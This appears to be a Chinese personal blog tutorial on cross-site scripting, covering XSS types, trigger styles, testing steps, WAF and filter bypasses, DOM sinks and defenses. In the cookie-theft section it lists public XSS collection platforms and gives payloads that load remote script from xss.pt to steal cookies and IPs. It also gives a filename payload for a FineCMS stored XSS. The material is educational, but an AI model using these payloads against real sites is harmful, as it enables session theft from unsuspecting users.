<!DOCTYPE html>
<html lang="zh-CN">
  
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"dtxharry.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":false,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":true,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":5,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="简单介绍XSS,XSS种类以及如何绕过过滤">
<meta property="og:type" content="article">
<meta property="og:title" content="Xss-跨站脚本攻击">
<meta property="og:url" content="https://dtxharry.github.io/2023/08/21/Xss-%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="dtxのRealm">
<meta property="og:description" content="简单介绍XSS,XSS种类以及如何绕过过滤">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:\Users\dtxha\AppData\Roaming\Typora\typora-user-images\image-20230506173435301.png">
<meta property="article:published_time" content="2023-08-21T08:35:01.000Z">
<meta property="article:modified_time" content="2023-08-21T14:40:28.689Z">
<meta property="article:author" content="dtxHarry">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\dtxha\AppData\Roaming\Typora\typora-user-images\image-20230506173435301.png">

<link rel="canonical" href="https://dtxharry.github.io/2023/08/21/Xss-%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Xss-跨站脚本攻击 | dtxのRealm</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>


<link rel="alternate" href="/atom.xml" title="dtxのRealm" type="application/atom+xml">
</head>



<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    
    <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
    

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">dtxのRealm</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">HackerStuff</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">32</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">4</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">38</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/dtxharry" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://dtxharry.github.io/2023/08/21/Xss-%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpeg">
      <meta itemprop="name" content="dtxHarry">
      <meta itemprop="description" content="随便写点自己的笔记">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dtxのRealm">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Xss-跨站脚本攻击
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-08-21 16:35:01 / 修改时间：22:40:28" itemprop="dateCreated datePublished" datetime="2023-08-21T16:35:01+08:00">2023-08-21</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">web渗透</span></a>
                </span>
            </span>

          
            <div class="post-description">简单介绍XSS,XSS种类以及如何绕过过滤</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="1-Xss简介"><a href="#1-Xss简介" class="headerlink" title="1.Xss简介"></a>1.Xss简介</h1><h2 id="1-什么是xss"><a href="#1-什么是xss" class="headerlink" title="(1)什么是xss"></a>(1)什么是xss</h2><p>是一种前端代码的注入手法 =&gt; 用户输入的数据被当做<strong>前端代码</strong>执行</p>
<p>前端代码:<strong>HTML</strong>[骨架]\<strong>CSS</strong>[美化]\<strong>JavaScript</strong>[可以实现一些功能(让网站可以不依赖后端),js可以控制浏览器]</p>
<h2 id="2-什么是cookie"><a href="#2-什么是cookie" class="headerlink" title="(2)什么是cookie"></a>(2)什么是cookie</h2><p>Xss最经典的操作就是偷cookie(存在于浏览器),其中cookie的由来如下:↓</p>
<p>​     HTTP/HTTPS 为了性能： 无状态、无连接协议  [无法区分用户]<br>​              =&gt; Cookie : 用一串随机字符来代替身份权限,存在于浏览器【不安全】</p>
<pre><code> **cookie的实效性**   =&gt; 看网站的设置，给很久，那就可以很久、很短
                         =&gt; 大部分网站的Cookie的都是一次会话
                         =&gt; 浏览器完整关闭就属于一次会话
</code></pre><p>​    <strong>cookie的同源性法则</strong>:同源的情况下coolie是共用的<br>​        <strong>同源的定义</strong>:必须同时满足   1.同ip/域名(域名要和域名相同,ip要和ip相同,大型网站比如百度ping出的ip不一定和www.baidu.com同源)<br>​                                                    2.同协议<br>​                                                    3.同端口<br>​        基本上同根目录的网站属于同源:<br>​                     <a target="_blank" rel="noopener" href="http://www.baidu.com">http://www.baidu.com</a><br>​                     <a target="_blank" rel="noopener" href="http://www.baidu.com/abc">http://www.baidu.com/abc</a></p>
<h2 id="3-Xss的种类"><a href="#3-Xss的种类" class="headerlink" title="(3)Xss的种类"></a>(3)Xss的种类</h2><h3 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h3><p> (你提交的数据成功的实现了XSS，但是仅仅是对你这次访问产生了影响，是非持久型攻击,单一访问有效)<br>比如靶场:      <strong>// ==&gt;注释</strong></p>
<pre><code>    &#39; oninput=alert(1) //
</code></pre><h3 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h3><p>嵌入到web页面的恶意HTML会被存储到应用服务器端，简而言之就是会被存储到数据库，等用户在打开页面时，会继续执行恶意代码，能够持续的攻击用户(你提交的数据成功的实现了XSS，存入了数据库，别人访问这个页面的时候就会自动触发,比如留言板)    </p>
<h3 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h3><p>DOM—based XSS漏洞是基于文档对象模型Document Object Model，DOM的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如uRI ，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM—based XSS漏洞。</p>
<h1 id="2-三种触发js的情况"><a href="#2-三种触发js的情况" class="headerlink" title="2.三种触发js的情况"></a>2.三种触发js的情况</h1><h2 id="标签风格："><a href="#标签风格：" class="headerlink" title="标签风格："></a>标签风格：</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(666)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="伪协议："><a href="#伪协议：" class="headerlink" title="伪协议："></a>伪协议：</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert(1)</span>&gt;</span>abcd<span class="tag">&lt;/<span class="name">a</span>&gt;</span> //只要有人调用了JavaScript:alert(1)就会弹窗</span><br><span class="line">[伪协议即小众协议,比如  weixin://     weishi://      dy://    ]</span><br><span class="line">javascript:alert(1) （经典代码<span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert(1)</span>&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span>）  Javascript实际上是一个伪协议</span><br><span class="line">    伪协议不同于因特网上所真实存在的协议，如http://，https://，ftp://，</span><br><span class="line">	伪协议只有关联应用能够用，比如 php://   tencent://(关联QQ) </span><br><span class="line">	      javascript:伪协议实际上声明了URL的主体是任意的javascript代码</span><br></pre></td></tr></table></figure>
<h2 id="事件型："><a href="#事件型：" class="headerlink" title="事件型："></a>事件型：</h2><p>事件(因为发生了某件事情，所以自动触发某个机制)<br>    关键词：在标签里面出现 onxxxx=要执行JS代码</p>
<p>​                onerror=  [加载失败的时候]<br>​                onload= [加载成功的时候]<br>​                onclick= [点击的时候]<br>​                oninput= [输入框输入数据的时候]<br>​                onfocus= [当获取光标的时候]<br>​                <strong>跟大部分标签可以任意组合</strong>    </p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">		<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&#x27;text&#x27;</span> /&gt;</span></span><br><span class="line">				↓</span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&#x27;text&#x27;</span> <span class="attr">oninput</span>=<span class="string">alert(11)</span> /&gt;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;123&quot;</span> <span class="attr">onerror</span>=<span class="string">alert(1)</span> /&gt;</span></span><br></pre></td></tr></table></figure>
<h1 id="3-测试XSS的步骤"><a href="#3-测试XSS的步骤" class="headerlink" title="3.测试XSS的步骤"></a>3.测试XSS的步骤</h1><h2 id="1-见框就插"><a href="#1-见框就插" class="headerlink" title="(1)见框就插"></a>(1)见框就插</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&quot; oninput=alert(1) //    #进行闭合</span><br><span class="line">&lt; script&gt;alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line">&quot; onfocus=alert(1) autofocus //</span><br><span class="line">&quot;&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="2-查看源码"><a href="#2-查看源码" class="headerlink" title="(2)查看源码"></a>(2)查看源码</h2><p>右键查看网页源代码,ctrl+F找到刚刚输入的内容,看看一共有几个输出点,从代码角度明白为什么没有弹窗,比如:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">&amp;lt;</span>script<span class="symbol">&amp;gt;</span>alert(12)<span class="symbol">&amp;lt;</span>/script<span class="symbol">&amp;gt;</span></span><br></pre></td></tr></table></figure>
<p>上面是源码中的内容,可见&lt;&gt;被过滤了,代码结构被破坏了. 这是一种防御xss的手法,叫做<strong>[HTML实体化]</strong>,这表明这个输出点没有xss漏洞</p>
<h2 id="3-找其他输出点"><a href="#3-找其他输出点" class="headerlink" title="(3)找其他输出点"></a>(3)找其他输出点</h2><p>如果其他输出点也是和(2)一样被过滤,那说明没有xss,但是会有其他的情况,则可以尝试闭合事件形,伪协议等方法进行xss</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">源码: <span class="tag">&lt;<span class="name">input</span> <span class="attr">name</span>=<span class="string">keyword</span> <span class="attr">value</span>=<span class="string">&#x27;sdfasdf&#x27;</span> &gt;</span></span><br><span class="line"></span><br><span class="line">尝试输入:  &#x27; oninput=alert(1)//</span><br></pre></td></tr></table></figure>
<h1 id="4-存储型xss窃取cookie"><a href="#4-存储型xss窃取cookie" class="headerlink" title="4.存储型xss窃取cookie"></a>4.存储型xss窃取cookie</h1><p>要达到这个功能,需要比较强的JS编写能力且必须要有公网服务器来接受偷到Cookie</p>
<p>以上暂时很难实现,所以我们可以用到<strong>XSS平台</strong>,它是已经搭建好的XSS攻击平台，只要注册就可以使用，针对非机密项目可以用.</p>
<h2 id="1-暂时存活的XSS平台"><a href="#1-暂时存活的XSS平台" class="headerlink" title="(1)暂时存活的XSS平台:"></a>(1)暂时存活的XSS平台:</h2><p>​            keepsession （封神台一段时间不操作Cookie会掉，每分钟固定访问让Cookie不会失效）<br>​            <Img sRC=https://xss.pt/8FTvp.jpg>   偷IP + 访问地址[偷不到Cookie]<br>​            <sCRiPt sRC=//xss.pt/8FTv>&lt;/sCrIpT&gt;  把//xss.pt/8FTv地址的东西当作JS代码执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">xss.pt      //常规XSS平台 </span><br><span class="line">xss.funwan.cn</span><br><span class="line">xss.iproute.cn</span><br><span class="line">xss.ceacer.cn</span><br><span class="line">usxss.xyz</span><br><span class="line">xssaq.com   //暴力平台</span><br><span class="line">xsscom.com  //xss靶场的时候不封ip的</span><br></pre></td></tr></table></figure>
<h2 id="2-遇到CMS框架的网站可以查一下曾经的通杀漏洞"><a href="#2-遇到CMS框架的网站可以查一下曾经的通杀漏洞" class="headerlink" title="(2)遇到CMS框架的网站可以查一下曾经的通杀漏洞"></a>(2)遇到CMS框架的网站可以查一下曾经的通杀漏洞</h2><p>finecms (v5.3.0)存在存储型xss漏洞</p>
<p>&lt;img src=”./upload/“ onerror=alert(1) //.jpg” width=”250px”&gt;</p>
<p>​    文件名可以为” onerror=alert(1) //.jpg</p>
<h1 id="5-DOM型xss"><a href="#5-DOM型xss" class="headerlink" title="5.DOM型xss"></a><strong>5.DOM型xss</strong></h1><h2 id="什么是DOM"><a href="#什么是DOM" class="headerlink" title="什么是DOM?"></a>什么是DOM?</h2><p>什么是DOM？<br>    DOM，全称Document Object Model，是一个平台和语言都中立的接口，可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式, 它就是一个树状的模型，你可以编写Javascript代码根据dom一层一层的节点，去遍历/获取/修改对应的节点,对象值。</p>
<p>​    每个载入浏览器的 HTML 文档都会成为 Document 对象。<br>​    Document 对象使我们可以从脚本中对 HTML 页面中的所有元素进行访问</p>
<p><strong>浏览器中有Window,document,location三个对象(widow对象下有location,document和history对象)</strong></p>
<h2 id="什么是DOM型XSS？"><a href="#什么是DOM型XSS？" class="headerlink" title="什么是DOM型XSS？"></a>什么是DOM型XSS？</h2><p>DOM型XSS其实是一种特殊类型的XSS，它是基于DOM文档对象模型的一种漏洞。<br>    DOM—based XSS漏洞是基于文档对象模型Document Object Model，DOM的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如uRI ，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM—based XSS漏洞。</p>
<p><strong>document.referer属性、window.name属性、location属性innerHTML属性</strong><br><strong>documen.write属性，都可以触发DOM XSS的属性</strong></p>
<h2 id="DOM型xss常见的js函数和使用情况"><a href="#DOM型xss常见的js函数和使用情况" class="headerlink" title="DOM型xss常见的js函数和使用情况"></a>DOM型xss常见的js函数和使用情况</h2><h3 id="document-cookie"><a href="#document-cookie" class="headerlink" title="document.cookie"></a>document.cookie</h3><p>读取当前网页的Cookie ,如果要传cookie,就后面加上<code>=&#39;123123123&#39;</code></p>
<h3 id="location-hash"><a href="#location-hash" class="headerlink" title="location.hash"></a>location.hash</h3><p>返回锚点后的值（#）</p>
<h1 id="锚点-相当于一个定位或者书签-不会刷新页面-所以基本不会被waf检测出来"><a href="#锚点-相当于一个定位或者书签-不会刷新页面-所以基本不会被waf检测出来" class="headerlink" title="锚点 :相当于一个定位或者书签,不会刷新页面,所以基本不会被waf检测出来"></a>锚点 :相当于一个定位或者书签,不会刷新页面,所以基本不会被waf检测出来</h1><h3 id="document-lastModified"><a href="#document-lastModified" class="headerlink" title="document.lastModified"></a>document.lastModified</h3><p>可以判断动态静态页面;<br>Html 静态文件<br>php jsp asp aspx 动态文件</p>
<p>document.lastModified可以查看当前网页最后修改时间。如果查到的时间随时间不断变化，为动态页面。<br>    如果查询出来的时间是固定不变的，则为静态页面。<br>    具体问题具体分析，这只是大体判断网页是否为静态页面，仅供参考。<br>    这个页面（<a target="_blank" rel="noopener" href="http://59.63.200.79:8014/dom_xss/index.php）就是动态页面。">http://59.63.200.79:8014/dom_xss/index.php）就是动态页面。</a><br>    这个页面（<a target="_blank" rel="noopener" href="https://www.pku.edu.cn/campuslife/zygy/index.htm）就是静态的。静态页面通常将参数">https://www.pku.edu.cn/campuslife/zygy/index.htm）就是静态的。静态页面通常将参数</a>   <code>域名?id=</code> 转变为 <code>域名/id.html</code></p>
<h3 id="document-write"><a href="#document-write" class="headerlink" title="document.write()"></a>document.write()</h3><p>这方法可向文档写入 HTML 表达式或 JavaScript 代码。</p>
<p>​    <code>http://59.63.200.79:8014/dom_xss/index.php/1.txt?id=1&lt;h1&gt;123&lt;/h1&gt;</code></p>
<script>document.write("/dom_xss/index.php/1.txt?id=1<h1>123</h1>");</script>

<p>document.write会把里边的内容写到网页中去。<br>比如<h1>标签的内容会变成标题。</p>
<script>alert(123)</script>

<h3 id="document-getElementById-innerHTML-’’"><a href="#document-getElementById-innerHTML-’’" class="headerlink" title="document.getElementById().innerHTML=’’"></a>document.getElementById().innerHTML=’’</h3><p>innerHTML 属性设置或返回表格行的开始和结束标签之间的 HTML,比如<code>&lt;div id=&#39;abcd&#39;&gt;NF&lt;/div&gt;</code>可以通过getElementById=’abcd’找到这个div标签,而NF就是这个标签中的innerHTML.</p>
<h2 id="如何绕过xss过滤"><a href="#如何绕过xss过滤" class="headerlink" title="如何绕过xss过滤"></a>如何绕过xss过滤</h2><p>针对事件型漏洞，一般网站可能会对双引号进行实体化编码，这个时候如果没有dom型，或者单引号不能使用的情况下，还是真的不好绕过</p>
<p>针对于黑名单过滤，总是过滤不全的，比如过滤了img，还有input，还有div等等<br>过滤了onclik、onmouseover，可以尝试比较冷梦的事件触发onmouseenter<br>过滤了小括号，可以尝试单引号，过滤了单引号可以尝试反引号<br>过滤了alert，可以尝试confirm和prompt<br>还有就是大小写、双写绕过之类的</p>
<h3 id="Native编码是document-write-可识别的编码-可以用来绕过waf"><a href="#Native编码是document-write-可识别的编码-可以用来绕过waf" class="headerlink" title="Native编码是document.write()可识别的编码,可以用来绕过waf"></a>Native编码是document.write()可识别的编码,可以用来绕过waf</h3><h3 id="index-php-1-txt也可绕waf"><a href="#index-php-1-txt也可绕waf" class="headerlink" title="index.php/1.txt也可绕waf"></a>index.php/1.txt也可绕waf</h3><p>因为web容器认为txt是安全的,传参没有问题,但是找不到1.txt就往前找到php了</p>
<h3 id="注释法也可以绕"><a href="#注释法也可以绕" class="headerlink" title="注释法也可以绕"></a>注释法也可以绕</h3><p><code>?id=/*&lt;script&gt;alert(1)&lt;/script&gt;*/</code>   /<em>*/之间的为注释,我的理解为因为是注释,所以狗让过了,但是在浏览器端,发现了右闭合标签可以和左边script标签闭合,所以进行了闭合,但是此时没有进行弹窗,要进行弹窗,得再给一个右闭合标签,才能让弹窗标签逃逸出来`<a target="_blank" rel="noopener" href="http://59.63.166.75:8154/?a=/">http://59.63.166.75:8154/?a=/</a></em>&lt;/script&gt;<script>alert(1)</script>*/`<img src="C:\Users\dtxha\AppData\Roaming\Typora\typora-user-images\image-20230506173435301.png" alt="image-20230506173435301"></p>
<h1 id=""><a href="#" class="headerlink" title=" "></a> </h1><h1 id="XSS防御方法："><a href="#XSS防御方法：" class="headerlink" title="XSS防御方法："></a>XSS防御方法：</h1><p>​    1、过滤<br>​    2、编码（HTML实体编码 替代可能产生危险的字符&lt;&gt;&amp;”）<br>​        标签风格XSS  [事件型|伪协议]<br>​    3、http-only (Cookie的一种属于，如果这个Cookie有http-only,那么JS是无法读取)<br>​        设置其实是在获取Cookie的设置（开发）<br>​        能绕过：<br>​            1、IE浏览器<br>​            2、想办法让页面输出Cookie(探针，phpinfo())</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>dtxHarry
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://dtxharry.github.io/2023/08/21/Xss-%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/" title="Xss-跨站脚本攻击">https://dtxharry.github.io/2023/08/21/Xss-跨站脚本攻击/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/XSS/" rel="tag"><i class="fa fa-tag"></i> XSS</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/08/21/EasyXssPaylod/" rel="prev" title="EasyXssPaylod">
      <i class="fa fa-chevron-left"></i> EasyXssPaylod
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/08/21/CSRF-%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0%E6%94%BB%E5%87%BB/" rel="next" title="CSRF-跨站请求伪造攻击">
      CSRF-跨站请求伪造攻击 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
